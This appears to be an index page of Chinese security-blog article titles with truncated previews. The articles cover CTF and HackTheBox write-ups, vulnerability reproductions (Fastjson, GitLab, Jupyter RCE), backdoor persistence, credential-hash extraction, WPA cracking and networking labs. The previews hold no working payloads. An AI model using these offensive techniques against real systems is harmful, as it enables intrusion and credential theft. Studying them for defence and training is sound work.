Java安全 CC链1分析前言CC链分析CC链1核心LazyMap类AnnotationInvocationHandler类完整exp： 前言在看这篇文章前，可以看下我的上一篇文章，了解下cc链1的核心与环境配置 Java安全 CC链1分析前面我们已经讲过了CC链1的核心ChainedTransf…

从零开始学howtoheap：理解fastbins的unsorted bin攻击

how2heap是由shellphish团队制作的堆利用教程，介绍了多种堆利用技术，后续系列实验我们就通过这个教程来学习。环境可参见从零开始配置pwn环境：从零开始配置pwn环境：从零开始配置pwn环境：优化pwn虚拟机配置支持libc等指…

BUUCTF-Real-[Jupyter]notebook-rce

1、简介 Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Pytho…

Packet Tracer - Configuring ASA Basic Settings and Firewall Using CLI

Packet Tracer - 使用CLI配置ASA基本设置和防火墙 IP地址表目标验证连接并探索ASA设备使用CLI配置ASA的基本设置和接口安全级别使用CLI配置路由、地址转换和检查策略配置DHCP、AAA和SSH服务配置DMZ区域、静态NAT和访问控制列表（ACL） 场景您的公司…

【网安神器篇】——hydra爆破工具

作者名：Demo不是emo 主页面链接：主页传送门创作初心：舞台再大，你不上台，永远是观众，没人会关心你努不努力，摔的痛不痛，他们只会看你最后站在什么位置，然后羡慕或鄙夷座右…

Web安全防护

一、Web安全简介二、Web攻击来源 1、客户端： 2、服务器： 3、通道： 三、Web应用基本组成部分 URL工作过程 HTTP/HTTPS HTTP有两类报文 HTTP请求报头 HTTP协议请求方法状态码状态码组成三、Cookie概述 Cookie和Session的关系 …

爬虫-6-数据提取-beautifulsoup4

#声明:本文仅供学习。 (●—●)

HackTheBox Stocker API滥用，CVE-2020-24815获取用户shell，目录遍历提权

靶机地址： https://app.hackthebox.com/machines/Stocker枚举使用nmap枚举靶机 nmap -sC -sV 10.10.11.196机子开放了22，80端口，我们本地解析一下这个域名 echo "10.10.11.196 stocker.htb" >> /etc/hosts 去浏览器访问…

自学（网络安全）黑客——高效学习2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

HCIP-2

Broadcast 类型查看 [R4]display ospf interface g0/0/0 OSPF Process 100 with Router ID 4.4.4.4 Interfaces Interface: 34.1.1.2 (GigabitEthernet0/0/0) Cost: 1 State: DROther Type: Broadcast MTU: 1500 Priority: 0 Designated Router: 34.1.1.1 Backup…

【复现】网康科技-防火墙存在RCE漏洞_17

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述网康下一代防火墙(NGFW)是一款可以全面应对应用层威胁的高性能防火墙。通过深入洞察网络流量中的用户、应用和内容，并…

Web漏洞-SQL注入(上)

SQL注入原理：用户输入动态的构造了意外sql语句，造成了意外结果使得攻击者有机可乘。（将sql语句插入或添加到应用参数中的攻击，之后再将这些参数传递给后台的SQL服务器加以解析并执行。）两个关键点：①参数是…

SQL注入——布尔盲注

目录一，盲注的概念二，盲注分类三，注入方法的选择四，关键函数五，实例一，盲注的概念页面没有报错回显，不知道数据库具体返回值的情况下，对数据库中的内容进行猜解&#x…

【现代密码学】笔记9-10.3-- 公钥（非对称加密）、混合加密理论《introduction to modern cryphtography》

【现代密码学】笔记9-10.3-- 公钥（非对称加密）、混合加密理论《introduction to modern cryphtography》写在最前面8.1 公钥加密理论随机预言机模型（Random Oracle Model，ROM） 写在最前面主要在哈工大密码学课程张…

Bugku CTF：请攻击这个压缩包[WriteUP]

拿到手就是一个加密了的压缩包里面有一个flag.png文件像这种没有任何提示的情况下只有三种选择： 1.暴力破解 2.考虑zip伪加密 3.明文攻击暴力破解，效率低而且不跑个一年半载大概率拿不到口令把文件拖进010editor查看，发现这是真加…

三、安全工程—安全架构（CISSP）

目录一、安全工程 1.企业安全架构与系统安全架构 2.通用企业架构框架 2.1 Zachman框架

HCIP-mpls实验

一.实验拓扑二.实验步骤 1、骨干链路IP地址及环回接口的配置 R2 [r2]int g0/0/2 [r2-GigabitEthernet0/0/2]ip a 23.0.0.1 24 [r2-GigabitEthernet0/0/2]int lo0 [r2-LoopBack0]ip a 2.2.2.2 24 R3 [r3]int g0/0/0 [r3-GigabitEthernet0/0/0]ip a 23.0.0.2 24 [r3-G…

对于Ubuntu服务器杀毒的一次记录

概述：叮咚！您的主机有异常登录地，登录ip来自人类文明的标杆美丽国的加利福尼亚州，请注意排查。可恶的老美啊，又来入侵我华夏主机了，美帝亡我之心不死啊（当然也有可能是境内中国人通过VPN操作境外…

Linux安装Zookeeper

Zookeeper可以作为分布式集群开发，本文是基于Centos7环境下安装的Zookeeper，具体步骤如下文所示： （1）下载Zookeeper，这里下载的是zookeeper-3.4.10.tar.gz，可以使用Linux的wget命令&#xff0c…

Kali-linux查看打开的端口

对一个大范围的网络或活跃的主机进行渗透测试，必须要了解这些主机上所打开的端口号。在Kali Linux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口，本节将介绍Nmap和Zenmap工具的使用。 4.4.1 TCP端口扫描工具Nmap 使…

Fastjson反序列化漏洞原理与复现

Fastjson反序列化漏洞原理与复现 1 漏洞介绍1.1 Fastjson简介1.2 漏洞原理 2 复现流程2.1 环境搭建2.2 测试2.3 过程分析 3 漏洞防御3.1 排查方法3.2 漏洞修复 1 漏洞介绍 1.1 Fastjson简介 Fastjson是java的一个库，可以将Java对象转化为json格式的字符串&#xf…

网络进阶学习：子网掩码及VLAN划分

网络进阶学习：子网掩码及VLAN划分什么是子网？什么是子网掩码？什么是VLAN子网掩码和VLAN的关系小结什么是子网？ ⭐子网是将一个大的IP地址段划分成若干个小的IP地址段的网络。子网可以帮助网络管理员更好地管理网络，…

实施基于零信任网络安全的设备控制

零信任安全是一种数据保护策略，除非系统管理员进行彻底验证，否则网络边界内外的所有设备和实体都不受信任。Device Control Plus 可帮助管理员为其网络实施和自动化零信任安全协议，以确保对来自未经批准的外围设备的所有端点数据提供最佳保护…

[CTF/网络安全] 攻防世界 baby_web 解题详析

[CTF/网络安全] 攻防世界 baby_web 解题详析 index.html & default.htmlindex.phpHTTP 302总结题目描述：想想初始页面是哪个 index.html & default.html 初始页面的文件名一般为 index.html 或 default.html。这两个文件名都是 Web 服务器默认的首选文件…

pwn入门HTB_You know 0xDiablos例题讲解

我希望能将我的疑惑记录，但是堆栈函数调用这些这些，几句话我很难讲清楚，多看教程，好教程很多至于解题基础，知道栈这种数据结构是一个线性表之后就够了，这题看不懂你来砍我文章目录前言这题干什么举个例子…

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时之网络安全新防御

ChatGPT：你真的了解网络安全吗？浅谈网络安全攻击防御进行时网络安全新防御1. 针对人工智能2. 针对5G和物联网3. 针对云安全4.针对社交工程5. 针对加密技术6. 针对多层次的安全控制 ChatGPT（全名：Chat Generative Pre-trained Tra…

操作系统权限维持（十）之Linux系统-SSH 软连接后门

系列文章操作系统权限维持（一）之Windows系统-粘贴键后门操作系统权限维持（二）之Windows系统-克隆账号维持后门操作系统权限维持（三）之Windows系统-启动项维持后门操作系统权限维持（四&…

全光网络相关知识

现如今我们传统的网络架构一般分为三层，接入层网络、汇聚层网络和核心层网络，也分为接入层交换机、汇聚层交换机和核心层交换机。接入层交换机就是直接连接客户端的。这里的客户端比如：医院坐诊医生的电脑、银行柜员的电脑、学校老师…

test_your_nc 题解

在有限中求无穷，便是我们所能有的自由。 ——朱自清今天来尝试一道pwn方向的题目。 ”Pwn”是一个黑客语法的俚语词 ，是指攻破设备或者系统。 “Pwn”很像“own”的意思，“own”的意思是“拥有权力或控制某人（to…

内网渗透(八十二)之 CVE-2019-1040 NTLM MIC 绕过漏洞

CVE-2019-1040 NTLM MIC 绕过漏洞漏洞背景 2019年6月11日，微软发布6月份安全补丁更新。在该安全补丁更新中，对 CVE-2019-1040 漏洞进行了修复。该漏洞存在于Windwos 大部分版本中，当中间人攻击者能够成功绕过NTLM 消息完整性校验（MIC）时，Windows 存在可能可篡改的漏洞…

内网渗透(四十九)之域控安全和跨域攻击-多种方式离线读取ntds.dit文件中的hash值

系列文章第一章节之基础知识篇内网渗透(一)之基础知识-内网渗透介绍和概述内网渗透(二)之基础知识-工作组介绍内网渗透(三)之基础知识-域环境的介绍和优点内网渗透(四)之基础知识-搭建域环境内网渗透(五)之基础知识-Active Directory活动目录介绍和使用内网渗透(六)之基…

广域网技术（二层封装技术）

广域网技术（二层封装技术） （LAN：局域网 WAN：广域网 WLAN：无线局域网 VLAN：虚拟局域网）（最早带宽：两根铜丝64kbit/s） 1、二层 — 数据链路层…

Win32通用控件，加载进程（PE查看器）项目初步

在本专栏上一篇文章中带领大家学习了对话框的创建，并且在项目中创建出了对话框。在这一篇文章中，我将带领大家学习Win32通用控件，了解_WM_NOTIFY消息，并且带领大家初步写出课程中加载Windows所有进程的应用程序的雏形，…

HACKTHEBOX——Irked

nmapnmap -sV -sC -Pn -T4 -oA nmap 10.10.10.117可能是因为网络原因，与目标链接并不稳定，因此添加了参数-Pn，也只扫描了常见的端口扫描可以看到只开启了3个端口，22,80和111。但是在访问web时，页面提示运行着irc因此再…

安全漏洞修复帖

对于项目漏洞都是一堆又不重要又很重要的事情一、修复HTTP 响应头缺失NginxTomcat响应头：值二、会话 Cookie 中缺少 secure 属性三、Html form 表单没有 CSRF 防护Security的示例Shiro的示例四、Host 头攻击NginxTomcatApache五、开启 options 方法一、修复HTTP 响应…

网络安全工程师岗位职责

HCIA笔记-----VLAN的划分

VLAN（虚拟局域网） 作用：划分广播域, 当交换机和路由器协同工作后，可以将一个广播域逻辑的且分为多个； MAC地址表：三元素 VLAN ID， 端口标识， MAC地址交换机基本工作过程&#xf…

使用OSPF配置动态路由综合实验

1. R1-R3为区域0，R3-R4为区域1；其中R3的环回也在区域0，R1，R2也各有一个换回 2. R1-R3 R3为DR设备，没有BDR 3. R4环回地址已固定，其他所有网段使用192.168.1.0/24进行合理的分配 4. R4环回不能宣告&#xff…

配置静态路由综合实验

除R5的环回地址固定以外，整个其他所有网段基于192.168.1.0/24进行合理的IP地址划分R1-R4每个路由器存在两个环回接口，用于模拟连接PC网段；地址也在192.168.1.0/24这个网络范围内R1-R4上不能直接编写到达5.5.5.0/24的静态路由，但依…

sql注入详解+docker靶场搭建举例

本文将详细介绍 SQL 注入攻击的概念、原理、危害以及防御措施，包括常见的 SQL 注入攻击方式，并实际演示 SQL 注入攻击的过程，帮助读者深入了解 SQL 注入攻击并学会防范和应对。一、SQL 注入攻击概述 1.1 什么是 SQL 注入攻击？ …

应急响应 - Windows进程分析，Windows网络分析，tasklist，wmic process

「作者简介」：CSDN top100、阿里云博客专家、华为云享专家、网络安全领域优质创作者「推荐专栏」：对网络安全感兴趣的小伙伴可以关注专栏《网络安全入门到精通》进程网络排查一、Tasklist1、tasklist /v1、tasklist /svc2、tasklist /m二、wmic proces…

权限提升：网站后台.（提权思路.）

权限提升：网站后台权限提升简称提权，由于操作系统都是多用户操作系统，用户之间都有权限控制，比如通过 Web 漏洞拿到的是 Web 进程的权限，往往 Web 服务都是以一个权限很低的账号启动的，因此通过 Webshell …

【严重】Artifex Software Ghostscript 任意命令执行漏洞（POC已公开）（CVE-2023-28879）

漏洞描述 Artifex Software Ghostscript是美国Artifex Software公司的一款开源的PostScript解析器。 Artifex Ghostscript 10.01.0及之前版本中，如果写入缓冲区的数据比总长度少一个字节，则尝试写入转义字符，导致两个字节被写入。攻击者可通…

WEB十大安全漏洞（OWASP Top 10）与渗透测试记录

1. 前言每年 OWASP（开放 Web 应用程序安全项目）都会发布十大安全漏洞。它代表了对 Web 应用程序最关键的安全风险的广泛共识。了解十大WEB漏洞种类并善于在渗透测试中发现漏洞是安全行业人员的基本要求。 2. OWASP TOP 10 2.1 OWASP Top10 2022 1.失…

CVE漏洞复现-CVE-2021-22205 GitLab未授权 RCE

CVE-2021-22205 GitLab未授权 RCE 漏洞背景和描述 2021年4月15日，GitLab官方发布安全补丁更新修复了GitLab命令执行漏洞（CVE-2021-22205）。由于GitLab中的ExifTool没有对传入的图像文件的扩展名进行正确处理，攻击者通过上传特制…

JWT渗透与防御

JWT渗透与防御什么是JWTJWT漏洞介绍工具使用身份认证(Authentication)又称鉴权，是指通过一定的手段，完成对用户身份的确认。认证的方式：sessioncookie、JWT、Token session认证的局限性 session认证机制需要配合cookie才能实现。由于cookie…

安全工程与运营

安全工程与运营系统安全工程系统安全工程重要性安全工程系统安全工程理论基础成立成熟度模型、系统安全工程能力成熟度模型能力成熟度模型（Capability Maturity Model）能力成熟度模型基本思想系统安全工程能力成熟度模型SSE-CMM的作用SSE-CMM体系结构域…

网络安全好就业吗？会不会容易被淘汰？

网络安全发展前景好吗？好就业吗？会不会容易被淘汰？很多刚入门或者想入门的小伙伴都会有这样的疑问今天就在这里给大家介绍一下。我就在这个行业，目前湖南，薪资就没必要说了，高就对了。这个行业优势就是工…

kali安装ARL灯塔过程

（一）安装docker环境 1、检查是否存在docker环境 docker 2、如果没有docker，就先安装docker apt install docker.io 出现 unable to locate package docker.io这些，这是因为没有跟新输入跟新命令： apt-get update 在…

pikachu靶场总结

目录一.暴力破解 1.基于表单的暴力破解 2.验证码绕过（on server） 3.验证码绕过（client） 4.token防爆破二.Cross-Site Scripting 1.先了解XSS 2.反射型xss（get） 3.反射型xss（post&…

Round#13 web专项部分wp

flask?jwt? 忘记密码处有secretkey 然后就是伪造session了,这里猜一下要什么最后应该是_is_admin有用,我没细看,当时平台卡麻了指正:改_user_id为1 ez_factors 注意到可以拼接命令,但是执行的回显只有数字那么可以考虑读取后用od命令来转8进制读取 flask?jwt?(hard) …

黑客最常用的10款黑客工具

以下所有这些工具都是捆绑在一起的Linux发行版，如Kali Linux或BackBox，所以我们一定会建议您安装一个合适的Linux黑客系统，使您的生活更轻松 - 尤其是因为这些黑客工具可以（自动）更新。 1、Nikto（网站漏洞…

无线WiFi安全渗透与攻防(十三)之WPA破解-windows下GPU跑包加速

WPA破解-windows下GPU跑包加速实现GPU加速的前提条件： 英伟达公司设计的计算统一设备架构 AMD 设计的流开放计算库 openCL 通过这两个技术，可以让显卡帮我们进行计算渗透 1.EWSA软件介绍一个非常不错的网络网络破解工具，可以直接破…

网络安全B模块（笔记详解）- 应急响应

应急响应 1.黑客通过网络攻入本地服务器，在Web服务器的主页上外挂了一个木马连接，请你找到此连接并删除该连接，将对应的标题名称作为flag值提交； Ms17-010攻击 Dirb查看网页内容查看他主页修改administrator密码远程连接主机发现网页目录脚本里有 Flag：skills 2.黑客…

2023年医疗信息化相关法规政策（上）

文章目录前言（1）关于促进数据安全产业发展的指导意见（工信部联网安〔2022〕182号）（2）关于印发突发事件紧急医学救援“十四五”规划的通知（国卫医急发〔2022〕35号）（3）关于印发委属（管）医院分院区建设管理办法（试行）的通知（国卫办规划发〔2022〕15号）（4）关于…

1、安全开发-Python爬虫EDUSRC目标FOFA资产Web爬虫解析库

用途：个人学习笔记，有所借鉴，欢迎指正前言： 主要包含对requests库和Web爬虫解析库的使用，python爬虫自动化，批量信息收集 Python开发工具：PyCharm 2022.1 激活破解码_安装教程 (2022年8月25日…

《计算机网络简易速速上手小册》第10章：未来网络技术趋势（2024 最新版）

文章目录 10.1 边缘计算与网络设计 - 未来网络的速度与激情10.1.1 基础知识10.1.2 重点案例：使用 Python 实现边缘计算的实时视频分析准备工作Python 脚本示例 10.1.3 拓展案例1：智能交通系统Python 脚本示例 - 边缘计算设备上的交通流量分析 10.1.4 拓展…

邮件系统市场行情分析

前言随着网络信息化的不断发展，邮件系统也日益成为企业对外沟通交流的重要工具，成为了企业的刚需。随着邮件系统技术的不断完善与发展，企业对于邮件系统功能的也提出了更高的要求。市面上逐渐诞生了众多的品牌和厂家。不同的厂家在系统的功能…

Apache Sling Resource Merger 存在拒绝服务漏洞（CVE-2023-26513）

漏洞描述 Apache Sling 是一个基于可扩展内容树(content tree)的 RESTful Web 应用程序框架，Resource Merger 用于在运行时将多个 Sling 资源合并为一个虚拟资源树。 MergingResourceProvider.java 类中的 getRelativePath 方法用于将根路径之外的绝对路径转化为相…

六年间全球十大勒索攻击事件盘点：没有底线全是算计

自2017年WannaCry席卷全球以来，勒索软件攻击不断演变，并逐渐形成产业化，其攻击规模、影响及破坏效果进一步扩大，已经对全球制造、金融、能源、医疗、政府组织等关键领域造成严重影响，在某些事件中，攻击者挟…

为什么有些购物网站需要做cdn加速

随时互联网的快速发展越来越多的人开始网上购物看剧，而常常出现浏览页面缓慢的问题。对于网站打开速度慢受很多因素的影响，简单归纳下常见的几个原因： 1.网站的图片和内容太大，需要花费很多时间下载； 2.网站使用了…

编译安装及yum安装

一、编译安装源码包：是由程序员按照特定格式和语法编写的包二进制包:源码包经过成功编译之后产生的包 1.tar -xf httpd-2.4.29.tar.bz #解压源码包 2.安装依赖环境 3.配置安装路径 4.编译make并安装 5.关闭防火墙，和安全机制 6.开启服务器 7.…

永恒之黑漏洞复现

永痕之黑 1. 永恒之黑漏洞相关信息漏洞介绍 https://nvd.nist.gov/vuln/detail/CVE-2020-0796 漏洞影响版本： Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Wi…

ToBeWritten之物联网MQTT、Z-Wave等协议

也许每个人出生的时候都以为这世界都是为他一个人而存在的，当他发现自己错的时候，他便开始长大少走了弯路，也就错过了风景，无论如何，感谢经历转移发布平台通知：将不再在CSDN博客发布新文章，敬…

第一次Android逆向初体验

不得不说，我的思维水平一直在低位徘徊，技术水平仍然停留在以前。就像有家公司，你去面试，他说他对一个人说的话的根本就不感兴趣，他想看看你写的东西，比如博客。我后来才感觉，他是对的&#xf…

服务器密码机国密标准GMT0030-2014

服务器密码机是指能独立或并行为多个应用实体提供密码运算、密钥管理等功能的设备，遵从国密标准GM/T0030-2014，以及GMT0018 密码设备应用接口规范。服务器密码机功能要求： （1）密码运算-对称密码算法（至少…

十二、Kali Linux 2 网络数据的嗅探与欺骗

网络数据的嗅探与欺骗无论什么样的漏洞渗透程序，在网络中都是以数据包的形式传输的，因此如果我们能够对网络中的数据包进行分析的话，就可以深入的掌握渗透的原理。另外很多网络攻击的方法也都是利用发送精心构造的数据包来完成，…

十、Kali Linux 2 编写漏洞渗透模块

漏洞渗透模块接下来你将会学习到渗透模块的开发，在这个过程还将涉及如何利用Metasploit的内置功能来加快开发的过程。我们将会介绍各种漏洞，并会尝试使用各种方法和途径去对这些漏洞进行渗透。除此之外，重点将放在渗透模块的开发上。我们还…

九、Kali Linux 2 社会工程学工具

社会工程学工具社会工程学是一种通过研究受害者心理，并以此诱使受害者做出配合，从而达到自身目的的方法。其实我一直觉得社会工程学和中国古代的“千术”十分类似，二者都是“欺骗的艺术”。历史上最著名的黑客米特尼克在他的作品《反欺骗的…

七、Kali Linux 2 渗透攻击

渗透攻击如果把目标系统上的漏洞比作阿克琉斯的脚踵，那么漏洞渗透工具就是帕里斯手中的利箭。在第6章中，我们介绍了如何使用远程控制工具，而在这一章中我们将会介绍如何将远程控制软件的被控端发送到目标主机上。而这个过程最为神奇的方法…

六、Kali Linux 2 远程控制

远程控制那么回过头来看，如果目标计算机上运行的VSFTPD v2.3.4被黑客使用笑脸漏洞成功渗透，就会自动在6200端口打开一个连接，而黑客可以通过这个连接实现对目标的控制。如果将这个连接比作一个很小的入口，它可能刚刚能容纳一个人…

四、Kali Linux 2 主动扫描

主动扫描： 相对被动扫描而言，主动扫描的范围要小得多。主动扫描一般都是针对目标发送特制的数据包，然后根据目标的反应来获得一些信息。这些信息主要包括目标主机是否在线，目标主机的指定端口是否开放，目标主机的操作…

Web 攻防之业务安全：接口参数账号篡改测试（修改别人邮箱 || 手机号为自己的）

Web 攻防之业务安全：接口参数账号篡改测试. 业务安全是指保护业务系统免受安全威胁的措施或手段。广义的业务安全应包括业务运行的软硬件平台（操作系统、数据库，中间件等）、业务系统自身（软件或设备）、业务…

备受认可！中睿天下荣登“2022创业邦100未来独角兽”年度榜单

近日，由创业邦、复旦大学管理学院主办的2022创业邦100未来独角兽峰会暨创业邦年会在上海举办。在峰会现场，2022创业邦100未来独角兽榜单正式揭晓，中睿天下凭借出众的综合实力荣登榜单。作为一家以“实战对抗”为特点的能力价值型网络安全厂商…

【网络攻击手段之-----ARP欺骗】

网络攻击手段之-----ARP欺骗前言什么是ARP欺骗APR欺骗的原理ARP欺骗的实现ARP欺骗后可以选择进一步攻击ARP欺骗的模拟实验Python语言C语言ARP欺骗的防御前言本篇文章介绍了什么是ARP欺骗，并使用了代码来模拟ARP的欺骗攻击，ARP 欺骗攻击是一种高危网络攻…

SQL盲注加速方法总结

sql盲注加速方法总结盲注分为布尔盲注和时间盲注，一般为加快测试速度都用工具或者脚本跑。但有时还是很慢，这时就需要采取另外办法。在参考了一些资料后经过实验总结可行方案如下。1.二分法加速、2.与运算加速、3.二进制延时注入加速、4.dnslog OOB外带…

HTTP与HTTPS：保护您的在线安全和隐私的关键差异

HTTP和HTTPS是互联网上最常见的两种协议之一。 HTTP（Hypertext Transfer Protocol）是用于在Web服务器和Web浏览器之间传输数据的标准协议。 HTTPS（Hypertext Transfer Protocol Secure）是一个安全的HTTP协议，使用SSL&a…

【高危】泛微 e-cology9 存在任意用户登录漏洞

漏洞描述泛微协同管理应用平台(e-cology)是一套企业大型协同管理平台。泛微e-cology9部分版本中存在前台任意用户登录漏洞，由于系统默认配置固定密钥进行用户身份验证。当存在/mobile/plugin/1/ofsLogin.jsp文件时（可能通过插件方式安装&#xff0…

CTFshow-pwn入门-前置基础pwn29-pwn31

什么是PIE 由于ASLR是一种操作系统层面的技术，而二进制程序本身是不支持随机化加载的，便出现了一些绕过方法，例如ret2plt、GOT劫持、地址爆破等。于是，人们于2003年引入了位置无关可执行文件（Position-Independent Ex…

黑客常用cmd命令（window版）

1、ping命令 ping命令是一个常用的网络工具，用来测试和诊断网络连接状况。通过发送ICMP（Internet控制消息协议）数据包到目标主机，并接收回复的数据包，可以测量目标主机的可达性、平均响应时间等指标。在Windows操作…

HomeIDC建设个人思路及分享

What/Why/How 这篇文章基本是有感而发，个人意见的成分较大，仅作参考 What-什么是HomeIDC 我相信全网应该除了我的Blog没有人提过这个词，家庭服务器很多IT从业者都喜欢搞，但说是IDC确实有点夸大其词，更多的倾向于Hom…

【信息安全案例】——应用软件安全（学习笔记）

📖 前言：随着应用软件日益增多，与我们的生活深度绑定，应用软件的安全性问题愈发凸显。针对恶意代码、代码漏洞等安全风险，必须加强安全意识，采取有效措施进行防范。合理有效的安全措施能够确保用户的信息安…

液冷数据中心的液体为何物

大家都知道IT设备是不能碰水的，遇到水会出现短路的情况，IT设备运行会出现发热的问题，降温主要依靠风扇散热和空调制冷。对于大型数据中心来说，设备降温是一大难题，近年来出现了新型的液冷数据中心。液冷数据中…

数据中心降温的必要性

前文讲述了降低数据中心PUE值的重要性，根据工业和信息化部、国家机关事务管理局、国家能源局三部门联合印发的《关于加强绿色数据中心建设的指导意见》，明确提出到2022年，数据中心平均能耗基本达到国际先进水平，新建大型、超大型数…

2023网安164道面试题（附答案）

最近有不少小伙伴跑来咨询： 想找网络安全工作，应该要怎么进行技术面试准备？工作不到 2 年，想跳槽看下机会，有没有相关的面试题呢？ 为了更好地帮助大家高薪就业，今天就给大家分享两份网络安全工…

dvwa靶场通关（五）

第五关 File Upload（文件上传漏洞） File Upload，即文件上传漏洞，通常是由于对上传文件的类型、内容没有进行严格的过滤、检查，使得攻击者可以通过上传木马获取服务器的webshell权限 low low等级没有任何的防护创建…

光模块的传输距离如何得出？

我们在选购光模块的时候都会考虑传输距离，厂家会匹配我们所需要的传输距离，光模块的传输距离分为短距、中距和长距，不同的光模块传输距离是不一样的，单模光模块搭配单模光纤进行中远距离传输，多模光模块搭配多模光纤进…

简易的交换机指令

前面我们讲过关于光模块的测试流程，DDM信息和厂商名等信息，但是如何查看这些信息，如何做测试呢？下面以华为交换机为例。 ①交换机接通电源，打开交换机，拿一条一端是RJ45接口另一端是USB接口的串口线…

账号长久不用、归属不明......企业要如何管理这些失控的账号？

据报道，谷歌将于今年底开始删除2年未使用个谷歌个人账号。理由是，谷歌发现，如果一个账户在一定时间内未被使用，那么该账户被入侵的概率更大。这些长时间未使用的账号使用的密码一般都是比较老的或重用的密码，关联密码…

单模光纤的相关知识

单模光纤连接的是单模光模块，因为传输的距离比较远，所以单模光纤的结构和多模光纤也不同。单模光纤跳线的纤芯直径比较小，为8μm到10μm，并且是沿着一条直线路径进行光传播，不会从边缘反弹，从而完全避免了色…

多模光纤的发展以及选择应用

光模块能正常工作少不了光纤跳线的搭配使用，多模模块连接多模光纤，单模模块连接单模光纤，这是众所周知的。今天我们就来讲讲多模光纤的发展及相关知识。多模光纤从OM1发展到目前的OM5,到底有哪些区别呢？ 现如今用…

铜缆VS光缆

随着网络时代对带宽要求的不断提高，出现了铜退光进的说法，光纤现在已经逐渐取代传统的铜缆，成为5G时代的主流。铜缆真的会被光缆所全部代替吗？下面我们就来讲述一下关于铜缆和光缆的一些知识。铜缆的优势： 尽管…

各个种类25G光模块的区别

前面我们说过25G光模块大致可以分为25G双纤光模块、25G WDM光模块和25G BIDI光模块，下面我们就来对比一下这三类光模块的优劣以及他们的相同点。这三类模块的最大的相同点就是其使用环境，都是用在25G以太网、数据中心以及5G网络前传当中&#xf…

25G BIDI光模块相关知识

25G BIDI光模块是一种单纤双向的25G光模块，和普通的25G光模块相比，25G BIDI模块只有一个光纤端口，只需要一根光纤连接，不过BIDI光模块都是成对使用，25G BIDI光模块也不例外。 25G BIDI 光模块在一根光线内同时…

BGP路由策略配置试验

要求： R1、R2、R3建立IBGP邻居 R4和R2、R3、R5、R6建立EBGP邻居 R7、R5、R6建立IBGP邻居 R7和R1上各有两个环回 R1访问100路由经过R1->R3->R4->R5->R7 R7访问10路由经过R7->R6->R4->R3->R1 在AS 3内为100.0.0.0/24的网段分配Community属性为…

CVE漏洞复现-CVE-2023-32233 NetFilter权限提升

CVE-2023-32233 NetFilter权限提升 Netfilter是Linux 内核中的网络数据包处理框架（iptables）通过各种规则和过滤器，基于数据包的来源、目标地址、协议类型、端口号等信息，控制网络流量和数据包的转发和处理具体，详情请…

护网是什么？怎么参加

一、什么是护网行动？ 护网行动是以公安部牵头的，用以评估企事业单位的网络安全的活动。具体实践中。公安部会组织攻防两方，进攻方会在一个月内对防守方发动网络攻击，检测出防守方（企事业单位）存在的安全…

GB/T 28448-2019 《信息安全技术网络安全等级保护测评要求》之安全通信网络测评解读

文章目录前言一、网络架构二、通信传输三、可信验证总结前言上期对GB/T 28448-2019 《信息安全技术网络安全等级保护测评要求》中第三级测评要求的安全测评通用要求的第一部分（安全物理环境）进行了解读，本期就安全测评通用要求第二部分&am…

GB/T 28448-2019 《信息安全技术网络安全等级保护测评要求》之安全物理环境测评解读

文章目录引言一、物理位置选择二、物理访问控制三、防盗窃和破坏四、防雷击五、防火六、防水和防潮七、防静电八、温湿度控制九、电力供应十、电磁防护总结引言 2019年12月1日，我国已经进入等保2.0时代，2017年6月1日《网络安全法》正式实施，…

2023年网络安全HW攻防技术总结（珍藏版）

2022年护网正当时，相信不少网安人都已经进入了状态。我们都知道， 护网行动是国家应对网络安全问题所做的重要布局之一。至今已经是7个年头了，很多公司在这时候人手不够，因此不得不招募一些网安人员来参加护网。红队扮演攻击…

普通学校计算机毕业生，从事网络安全行业可以吗？

如果你是普通大学、大专的计算机专业应届生，还在迷茫找工作，这篇内容希望你能认真看完，很可能会决定你的人生方向。现在的高薪行业，除了明星就只能是程序员了。不信你问问身边的人想学哪个专业，他们肯定不假思索的说…

网络安全（黑客）怎么自学？

最近看到很多问题，都是小白想要转行网络安全行业咨询学习路线和学习资料的，作为一个培训机构，学习路线和免费学习资料肯定是很多的。机构里面的不是顶级的黑阔大佬就是正在学习的同学，也用不上这些内容，每天都在某云盘…

2023年最新网络安全入门指南，保姆级教程！啃完这篇就够了

一、网络安全学习的误区 1.不要试图以编程为基础去学习网络安全不要以编程为基础再开始学习网络安全，一般来说，学习编程不但学习周期长，且过渡到网络安全用到编程的用到的编程的关键点不多。一般人如果想要把编程学好再开始学习网络安全往…

云安全（一） - 浅谈基于IaaS公有云的中小型企业基础安全建设

背景互联网数据中心（IDC）属于互联网基础设施范畴的一个细分领域。为企业、金融机构等提供一个存放服务器的空间场所，随着科技技术的发展，IDC也经历了一个又一个的里程碑，如下图是：摘自《美国数据中心建设…

TCP与UDP及NMAP扫描

TCP与UDP TCP是一种面向连接（连接导向）的、可靠的、基于字节流的运输层通信协议；UDP协议的全称是用户数据报协议，在网络中它与TCP协议一样用于处理数据包，是一种无连接的协议。建立TCP连接的三次握手： 第一…

HVV蓝队扫盲，关于HVV你不知道的全在这

HVV蓝队扫盲，关于HVV你不知道的全在这 1.蓝队实战阶段职责分工2.蓝队防守的四个阶段3.蓝队常用防护手段4.蓝队常用安全设备边界防御设备安全检测设备流量监测设备终端防护设备威胁情报系统5.蓝队作战的三个阶段6.演练禁止采用的攻击方式1.蓝队实战阶段职责分工 1、领导小组。为…

2023届安全岗秋招经验分享，没看这篇文章就去秋招的你会后悔的！【建议收藏】

目录需要准备的几个方向安全岗职位要求面试技巧安全相关面试题需要准备的几个方向简历自我介绍计算机网络操作系统（操作系统原理，Linux，Windows）数据库算法（Leetcode）编程语言（Python…

fastjson1.2.47以下 RCE 漏洞复现

